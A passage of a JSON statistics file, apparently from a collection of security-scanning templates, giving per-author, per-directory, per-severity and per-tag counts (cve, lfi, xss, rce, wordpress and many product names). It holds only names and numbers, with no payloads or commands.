security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":832},{"name":"lfi","count":342},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":240},{"name":"rce","count":214},{"name":"tech","count":197},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":92},{"name":"apache","count":73},{"name":"iot","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"router","count":22},{"name":"misconfig","count":22},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"aws","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"rails","count":8},{"name":"nginx","count":8},{"name":"ibm","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"microsoft","count":8},{"name":"cnvd","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"solr","count":6},{"name":"phpmyadmin","count":6},{"name":"lucee","count":6},{"name":"docker","count":6},{"name":"fileupload","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"jetty","count":6},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"ssti","count":5},{"name":"iis","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"thinkcmf","count":4},{"name":"samsung","count":4},{"name":"firmware","count":4},{"name":"npm","count":4},{"name":"zimbra","count":4},{"name":"resin","count":4},{"name":"magmi","count":4},{"name":"artifactory","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"slack","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"asp","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"rfi","count":4},{"name":"fatpipe","count":4},{"name":"symantec","count":4},{"name":"wso2","count":4},{"name":"zabbix","count":4},{"name":"buffalo","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"strapi","count":4},{"name":"amazon","count":4},{"name":"proxy","count":4},{"name":"ssh","count":3},{"name":"httpd","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"injection","count":3},{"name":"cloud","count":3},{"name":"bigip","count":3},{"name":"nexus","count":3},{"name":"kibana","count":3},{"name":"smtp","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"itop","count":3},{"name":"springcloud","count":3},{"name":"telerik","count":3},{"name":"jeesns","count":3},{"name":"search","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"bitrix","count":3},{"name":"node","count":3},{"name":"exposures","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"sonicwall","count":3},{"name":"mongodb","count":3},{"name":"kevinlab","count":3},{"name":"cves","count":3},{"name":"openam","count":3},{"name":"ofbiz","count":3},{"name":"cve2007","count":3},{"name":"targa","count":3},{"name":"azure","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"mail","count":3},{"name":"caucho","count":3},{"name":"vbulletin","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"cacti","count":3},{"name":"lfr","count":3},{"name":"druid","count":3},{"name":"opensis","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"github","count":3},{"name":"prometheus","count":3},{"name":"hoteldruid","count":3},{"name":"nosqli","count":3},{"name":"backdoor","count":3},{"name":"tikiwiki","count":3},{"name":"igs","count":2},{"name":"wuzhicms","count":2},{"name":"backups","count":2},{"name":"vcenter","count":2},{"name":"payara","count":2},{"name":"upload","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"yii","count":2},{"name":"flir","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"geowebserver","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"places","count":2},{"name":"bypass","count":2},{"name":"hashicorp","count":2},{"name":"status","count":2},{"name":"akamai","count":2},{"name":"odoo","count":2},{"name":"rancher","count":2},{"name":"avantfax","count":2},{"name":"waf","count":2},{"name":"chyrp","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aviatrix","count":2},{"name":"wordfence","count":2},{"name":"bitly","count":2},{"name":"totemomail","count":2},{"name":"getsimple","count":2},{"name":"minio","count":2},{"name":"justwriting","count":2},{"name":"spark","count":2},{"name":"glassfish","count":2},{"name":"grav","count":2},{"name":"linux","count":2},{"name":"service","count":2},{"name":"axis","count":2},{"name":"qihang","count":2},{"name":"commax","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"huawei","count":2},{"name":"jsf","count":2},{"name":"hostheader-injection","count":2},{"name":"jboss","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"hjtcloud","count":2},{"name":"tidb","count":2},{"name":"icewarp","count":2},{"name":"yapi","count":2},{"name":"sitecore","count":2},{"name":"kong","count":2},{"name":"shellshock","count":2},{"name":"text","count":2},{"name":"lotus","count":2},{"name":"idrac","count":2},{"name":"saltstack","count":2},{"name":"netis","count":2},{"name":"storage","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"rockmongo","count":2},{"name":"horde","count":2},{"name":"chiyu","count":2},{"name":"chamilo","count":2},{"name":"nextcloud","count":2},{"name":"paloalto","count":2},{"name":"phpcollab","count":2},{"name":"showdoc","count":2},{"name":"electron","count":2},{"name":"emerge","count":2},{"name":"trixbox","count":2},{"name":"openvpn","count":2},{"name":"embed","count":2},{"name":"globalprotect","count":2},{"name":"guacamole","count":2},{"name":"axis2","count":2},{"name":"mailchimp","count":2},{"name":"adminer","count":2},{"name":"ucmdb","count":2},{"name":"liferay","count":2},{"name":"favicon","count":2},{"name":"sharepoint","count":2},{"name":"prestashop","count":2},{"name":"bucket","count":2},{"name":"webcam","count":2},{"name":"vrealize","count":2},{"name":"plesk","count":2},{"name":"kentico","count":2},{"name":"enumeration","count":2},{"name":"rstudio","count":2},{"name":"maian","count":2},{"name":"openfire","count":2},{"name":"frp","count":2},{"name":"voipmonitor","count":2},{"name":"heroku","count":2},{"name":"pega","count":2},{"name":"bruteforce","count":2},{"name":"ecology","count":2},{"name":"nagios","count":2},{"name":"aruba","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"fortios","count":2},{"name":"mida","count":2},{"name":"xxljob","count":2},{"name":"oauth","count":2},{"name":"qcubed","count":2},{"name":"dos","count":2},{"name":"middleware","count":2},{"name":"s3","count":2},{"name":"prtg","count":2},{"name":"dolibarr","count":2},{"name":"cache","count":2},{"name":"splunk","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"natshell","count":2},{"name":"sonarqube","count":2},{"name":"sentry","count":1},{"name":"digitalocean","count":1},{"name":"jsp","count":1},{"name":"goahead","count":1},{"name":"speed","count":1},{"name":"pgadmin","count":1},{"name":"episerver","count":1},{"name":"gitea","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"proftpd","count":1},{"name":"ecom","count":1},{"name":"yzmcms","count":1},{"name":"beanstalk","count":1},{"name":"nette","count":1},{"name":"vidyo","count":1},{"name":"landrayoa","count":1},{"name":"azkaban","count":1},{"name":"cloudflare","count":1},{"name":"owasp","count":1},{"name":"hiboss","count":1},{"name":"tinypng","count":1},{"name":"biometrics","count":1},{"name":"novnc","count":1},{"name":"phpfastcache","count":1},{"name":"phalcon","count":1},{"name":"starttls","count":1},{"name":"placeos","count":1},{"name":"plone","count":1},{"name":"elascticsearch","count":1},{"name":"iceflow","count":1},{"name":"cves2001","count":1},{"name":"remkon","count":1},{"name":"tcexam","count":1},{"name":"olivetti","count":1},{"name":"expressjs","count":1},{"name":"vscode","count":1},{"name":"graylog","count":1},{"name":"buildkite","count":1},{"name":"xvr","count":1},{"name":"iptime","count":1},{"name":"javascript","count":1},{"name":"mautic","count":1},{"name":"octoprint","count":1},{"name":"camunda","count":1},{"name":"tensorflow","count":1},{"name":"oscommerce","count":1},{"name":"qsan","count":1},{"name":"vnc","count":1},{"name":"couchbase","count":1},{"name":"blackboard","count":1},{"name":"mod-proxy","count":1},{"name":"twitter","count":1},{"name":"acexy","count":1},{"name":"axiom","count":1},{"name":"frontpage","count":1},{"name":"chinaunicom","count":1},{"name":"cors","count":1},{"name":"qvisdvr","count":1},{"name":"sgp","count":1},{"name":"moin","count":1},{"name":"sendgrid","count":1},{"name":"dnssec","count":1},{"name":"landray","count":1},{"name":"spip","count":1},{"name":"circontrorl","count":1},{"name":"messaging","count":1},{"name":"swagger","count":1},{"name":"testrail","count":1},{"name":"hadoop","count":1},{"name":"esmtp","count":1},{"name":"rujjie","count":1},{"name":"labtech","count":1},{"name":"sql","count":1},{"name":"wildfly","count":1},{"name":"phpunit","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"rdp","count":1},{"name":"elfinder","count":1},{"name":"openx","count":1},{"name":"zyxel","count":1},{"name":"pacsone","count":1},{"name":"servicedesk","count":1},{"name":"zenario","count":1},{"name":"zmanda","count":1},{"name":"glances","count":1},{"name":"octobercms","count":1},{"name":"blind","count":1},{"name":"expose","count":1},{"name":"sage","count":1},{"name":"redhat","count":1},{"name":"zarafa","count":1},{"name":"socomec","count":1},{"name":"details","count":1},{"name":"anchorcms","count":1},{"name":"perl","count":1},{"name":"cloudinary","count":1},{"name":"totaljs","count":1},{"name":"jenkin","count":1},{"name":"panos","count":1},{"name":"grails","count":1},{"name":"artica","count":1},{"name":"faraday","count":1},{"name":"sprintful","count":1},{"name":"solarlog","count":1},{"name":"bookstack","count":1},{"name":"oidc","count":1},{"name":"discord","count":1},{"name":"webadmin","count":1},{"name":"codeigniter","count":1},{"name":"cerebro","count":1},{"name":"mobileiron","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"simplecrm","count":1},{"name":"tongda","count":1},{"name":"nifi","count":1},{"name":"spring","count":1},{"name":"vsftpd","count":1},{"name":"rocketchat","count":1},{"name":"dotnetnuke","count":1},{"name":"tieline","count":1},{"name":"openemr","count":1},{"name":"trane","count":1},{"name":"addpac","count":1},{"name":"clave","count":1},{"name":"pyramid","count":1},{"name":"email","count":1},{"name":"wavlink","count":1},{"name":"emc","count":1},{"name":"alerta","count":1},{"name":"wing-ftp","count":1},{"name":"jumpcloud","count":1},{"name":"shopxo","count":1},{"name":"sophos","count":1},{"name":"processmaker","count":1},{"name":"sco","count":1},{"name":"auth","count":1},{"name":"gurock","count":1},{"name":"gespage","count":1},{"name":"secmail","count":1},{"name":"geocode","count":1},{"name":"acontent","count":1},{"name":"idemia","count":1},{"name":"ssl","count":1},{"name":"mkdocs","count":1},{"name":"eyou","count":1},{"name":"visualstudio","count":1},{"name":"feifeicms","count":1},{"name":"svn","count":1},{"name":"lancom","count":1},{"name":"redmine","count":1},{"name":"basic-auth","count":1},{"name":"clink-office","count":1},{"name":"jmx","count":1},{"name":"zzzcms","count":1},{"name":"mongo","count":1},{"name":"deviantart","count":1},{"name":"xampp","count":1},{"name":"fastapi","count":1},{"name":"vsphere","count":1},{"name":"uwsgi","count":1},{"name":"cofax","count":1},{"name":"htmli","count":1},{"name":"iterable","count":1},{"name":"openerp","count":1},{"name":"panasonic","count":1},{"name":"skywalking","count":1},{"name":"nc2","count":1},{"name":"mirai","count":1},{"name":"ssltls","count":1},{"name":"drone","count":1},{"name":"magicflow","count":1},{"name":"upnp","count":1},{"name":"empirecms","count":1},{"name":"primetek","count":1},{"name":"tracer","count":1},{"name":"redis","count":1},{"name":"circontrol","count":1},{"name":"dropbox","count":1},{"name":"tpshop","count":1},{"name":"circleci","count":1},{"name":"floc","count":1},{"name":"shopizer","count":1},{"name":"nimble","count":1},{"name":"photo","count":1},{"name":"fortinet","count":1},{"name":"cgi","count":1},{"name":"gridx","count":1},{"name":"gitlist","count":1},{"name":"netrc","count":1},{"name":"avalanche","count":1},{"name":"haproxy","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"bolt","count":1},{"name":"yealink","count":1},{"name":"froxlor","count":1},{"name":"graphite","count":1},{"name":"skycaiji","count":1},{"name":"autocomplete","count":1},{"name":"gsoap","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"contentkeeper","count":1},{"name":"maxsite","count":1},{"name":"interlib","count":1},{"name":"distance","count":1},{"name":"clockwatch","count":1},{"name":"servicenow","count":1},{"name":"tjws","count":1},{"name":"javafaces","count":1},{"name":"weather","count":1},{"name":"pivotaltracker","count":1},{"name":"actuator","count":1},{"name":"locations","count":1},{"name":"arl","count":1},{"name":"zcms","count":1},{"name":"miscrsoft","count":1},{"name":"websvn","count":1},{"name":"adb","count":1},{"name":"cscart","count":1},{"name":"panabit","count":1},{"name":"monitorr","count":1},{"name":"gloo","count":1},{"name":"svnserve","count":1},{"name":"optiLink","count":1},{"name":"centos","count":1},{"name":"shopware","count":1},{"name":"maccmsv10","count":1},{"name":"aspnuke","count":1},{"name":"api-manager","count":1},{"name":"clickhouse","count":1},{"name":"hubspot","count":1},{"name":"find","count":1},{"name":"mailgun","count":1},{"name":"huijietong","count":1},{"name":"opm","count":1},{"name":"razor","count":1},{"name":"solman","count":1},{"name":"commscope","count":1},{"name":"tugboat","count":1},{"name":"viewlinc","count":1},{"name":"woocomernce","count":1},{"name":"codemeter","count":1},{"name":"dbeaver","count":1},{"name":"linkedin","count":1},{"name":"xunchi","count":1},{"name":"parentlink","count":1},{"name":"burp","count":1},{"name":"nomad","count":1},{"name":"buttercms","count":1},{"name":"dompdf","count":1},{"name":"tika","count":1},{"name":"jaspersoft","count":1},{"name":"ioncube","count":1},{"name":"place","count":1},{"name":"nexusdb","count":1},{"name":"geutebruck","count":1},{"name":"bash","count":1},{"name":"keenetic","count":1},{"name":"myucms","count":1},{"name":"mara","count":1},{"name":"office365","count":1},{"name":"fortiweb","count":1},{"name":"sqlite","count":1},{"name":"tileserver","count":1},{"name":"postmessage","count":1},{"name":"bedita","count":1},{"name":"logontracer","count":1},{"name":"shoretel","count":1},{"name":"phpfusion","count":1},{"name":"phpshowtime","count":1},{"name":"fortilogger","count":1},{"name":"announcekit","count":1},{"name":"tenda","count":1},{"name":"spectracom","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"adiscon","count":1},{"name":"karel","count":1},{"name":"calendarix","count":1},{"name":"pcoip","count":1},{"name":"mantis","count":1},{"name":"lotuscms","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"opencast","count":1},{"name":"extractor","count":1},{"name":"okta","count":1},{"name":"package","count":1},{"name":"wooyun","count":1},{"name":"argussurveillance","count":1},{"name":"natemail","count":1},{"name":"qdpm","count":1},{"name":"eprints","count":1},{"name":"acme","count":1},{"name":"ruckus","count":1},{"name":"csrfguard","count":1},{"name":"thinkadmin","count":1},{"name":"pulsesecure","count":1},{"name":"webftp","count":1},{"name":"postmark","count":1},{"name":"powercreator","count":1},{"name":"k8","count":1},{"name":"manager","count":1},{"name":"kubeflow","count":1},{"name":"route","count":1},{"name":"spidercontrol","count":1},{"name":"alibaba","count":1},{"name":"tor","count":1},{"name":"zte","count":1},{"name":"saltapi","count":1},{"name":"twitter-server","count":1},{"name":"wakatime","count":1},{"name":"bing","count":1},{"name":"node-red-dashboard","count":1},{"name":"ems","count":1},{"name":"youtube","count":1},{"name":"turbocrm","count":1},{"name":"gilacms","count":1},{"name":"synnefo","count":1},{"name":"portainer","count":1},{"name":"cse","count":1},{"name":"moinmoin","count":1},{"name":"accela","count":1},{"name":"cobub","count":1},{"name":"sidekiq","count":1},{"name":"ipstack","count":1},{"name":"omi","count":1},{"name":"st","count":1},{"name":"nearby","count":1},{"name":"calendly","count":1},{"name":"geddy","count":1},{"name":"wiki","count":1},{"name":"ntopng","count":1},{"name":"cyberoam","count":1},{"name":"expn","count":1},{"name":"k8s","count":1},{"name":"memcached","count":1},{"name":"checkpoint","count":1},{"name":"rmi","count":1},{"name":"sceditor","count":1},{"name":"ognl","count":1},{"name":"etherpad","count":1},{"name":"dvwa","count":1},{"name":"wifisky","count":1},{"name":"hortonworks","count":1},{"name":"erp-nc","count":1},{"name":"phpwiki","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"elasticsearch","count":1},{"name":"seacms","count":1},{"name":"sangfor","count":1},{"name":"zms","count":1},{"name":"finereport","count":1},{"name":"selea","count":1},{"name":"owa","count":1},{"name":"clusterengine","count":1},{"name":"varnish","count":1},{"name":"roads","count":1},{"name":"pendo","count":1},{"name":"apiman","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"b2evolution","count":1},{"name":"mantisbt","count":1},{"name":"ambari","count":1},{"name":"smartsense","count":1},{"name":"lg-nas","count":1},{"name":"cve202","count":1},{"name":"ns","count":1},{"name":"avtech","count":1},{"name":"realteo","count":1},{"name":"viewpoint","count":1},{"name":"embedthis","count":1},{"name":"nps","count":1},{"name":"ricoh","count":1},{"name":"asus","count":1},{"name":"eg","count":1},{"name":"redwood","count":1},{"name":"fortigate","count":1},{"name":"xml","count":1},{"name":"timezone","count":1},{"name":"opentsdb","count":1},{"name":"wamp","count":1},{"name":"fedora","count":1},{"name":"gogs","count":1},{"name":"chevereto","count":1},{"name":"mariadb","count":1},{"name":"mpsec","count":1},{"name":"subrion","count":1},{"name":"zookeeper","count":1},{"name":"plastic","count":1},{"name":"graphql","count":1},{"name":"jenzabar","count":1},{"name":"csrf","count":1},{"name":"limit","count":1},{"name":"soar","count":1},{"name":"plc","count":1},{"name":"linksys","count":1},{"name":"nedi","count":1},{"name":"spotify","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"traefik","count":1},{"name":"sarg","count":1},{"name":"metabase","count":1},{"name":"jitsi","count":1},{"name":"mapbox","count":1},{"name":"mysql","count":1},{"name":"achecker","count":1},{"name":"mongoshake","count":1},{"name":"clockwork","count":1},{"name":"ulterius","count":1},{"name":"lutron","count":1},{"name":"ganglia","count":1},{"name":"pippoint","count":1},{"name":"appweb","count":1},{"name":"dvr","count":1},{"name":"netmask","count":1},{"name":"mediumish","count":1},{"name":"woocommerce","count":1},{"name":"h3c-imc","count":1},{"name":"ewebs","count":1},{"name":"myvuehelp","count":1},{"name":"lighttpd","count":1},{"name":"zend","count":1},{"name":"syslog","count":1},{"name":"rmc","count":1},{"name":"duomicms","count":1},{"name":"sar2html","count":1},{"name":"raspap","count":1},{"name":"opensmtpd","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"diris","count":1},{"name":"listserv","count":1},{"name":"dom","count":1},{"name":"wazuh","count":1},{"name":"kerbynet","count":1},{"name":"rsyncd","count":1},{"name":"netdata","count":1},{"name":"xmlchart","count":1},{"name":"gunicorn","count":1},{"name":"minimouse","count":1},{"name":"crm","count":1},{"name":"majordomo2","count":1},{"name":"beanshell","count":1},{"name":"trilithic","count":1},{"name":"74cms","count":1},{"name":"lokalise","count":1},{"name":"triconsole","count":1},{"name":"tensorboard","count":1},{"name":"etouch","count":1},{"name":"monitorix","count":1},{"name":"smi","count":1},{"name":"bingmaps","count":1},{"name":"terraform","count":1},{"name":"asana","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"nerdgraph","count":1},{"name":"database","count":1},{"name":"loqate","count":1},{"name":"jquery","count":1},{"name":"pmb","count":1},{"name":"bigbluebutton","count":1},{"name":"ghost","count":1},{"name":"hiawatha","count":1},{"name":"pagespeed","count":1},{"name":"oneblog","count":1},{"name":"circle","count":1},{"name":"kindeditor","count":1},{"name":"cloudron","count":1},{"name":"tamronos","count":1},{"name":"bullwark","count":1},{"name":"mrtg","count":1},{"name":"werkzeug","count":1},{"name":"dotnet","count":1},{"name":"newrelic","count":1},{"name":"key","count":1},{"name":"gotmls","count":1},{"name":"blue-ocean","count":1},{"name":"bazarr","count":1},{"name":" default-login","count":1},{"name":"cocoon","count":1},{"name":"wmt","count":1},{"name":"gateone","count":1},{"name":"doh","count":1},{"name":"timeclock","count":1},{"name":"jeewms","count":1},{"name":"kyan","count":1},{"name":"pihole","count":1},{"name":"craftcms","count":1},{"name":"daybyday","count":1},{"name":"flexbe","count":1},{"name":"sureline","count":1},{"name":"netgenie","count":1},{"name":"smartblog","count":1},{"name":"travis","count":1},{"name":"imap","count":1},{"name":"matrix","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"lanproxy","count":1},{"name":"rabbitmq","count":1},{"name":"nuxeo","count":1},{"name":"webui","count":1},{"name":"sonarcloud","count":1},{"name":"rhymix","count":1},{"name":"wondercms","count":1},{"name":"default","count":1},{"name":"jnoj","count":1},{"name":"shoppable","count":1},{"name":"weglot","count":1},{"name":"pagerduty","count":1},{"name":"loganalyzer","count":1},{"name":"playable","count":1},{"name":"phpinfo","count":1},{"name":"geolocation","count":1},{"name":"influxdb","count":1},{"name":"instagram","count":1},{"name":"plugin","count":1},{"name":"javamelody","count":1},{"name":"resourcespace","count":1},{"name":"streetview","count":1},{"name":"rockethchat","count":1},{"name":"domxss","count":1},{"name":"wavemaker","count":1},{"name":"alertmanager","count":1},{"name":"apos","count":1},{"name":"xdcms","count":1},{"name":"ruby","count":1},{"name":"sourcebans","count":1},{"name":"zeroshell","count":1},{"name":"motorola","count":1},{"name":"openweather","count":1},{"name":"exacqvision","count":1},{"name":"luftguitar","count":1},{"name":"rubedo","count":1},{"name":"robomongo","count":1},{"name":"nsasg","count":1},{"name":"scs","count":1},{"name":"nweb2fax","count":1},{"name":"okiko","count":1},{"name":"concrete","count":1},{"name":"nuuo","count":1},{"name":"dotclear","count":1},{"name":"flink","count":1},{"name":"livezilla","count":1},{"name":"fcm","count":1},{"name":"cve2006","count":1},{"name":"whm","count":1},{"name":"aura","count":1},{"name":"nordex","count":1},{"name":"ilo4","count":1},{"name":"scimono","count":1},{"name":"tectuus","count":1},{"name":"graph","count":1},{"name":"csod","count":1},{"name":"webmodule-ee","count":1},{"name":"kafdrop","count":1},{"name":"opensns","count":1},{"name":"discourse","count":1},{"name":"stripe","count":1},{"name":"salesforce","count":1},{"name":"tapestry","count":1},{"name":"darkstat","count":1},{"name":"setup","count":1},{"name":"gstorage","count":1},{"name":"krweb","count":1},{"name":"yachtcontrol","count":1},{"name":"eyelock","count":1},{"name":"directions","count":1},{"name":"elevation","count":1},{"name":"fortigates","count":1},{"name":"fiori","count":1},{"name":"square","count":1},{"name":"openstack","count":1},{"name":"szhe","count":1},{"name":"springframework","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"divya_mudgal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"me9187","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"sullo","count":3},{"name":"sushantkamble","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"f1tz","count":3},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"gal 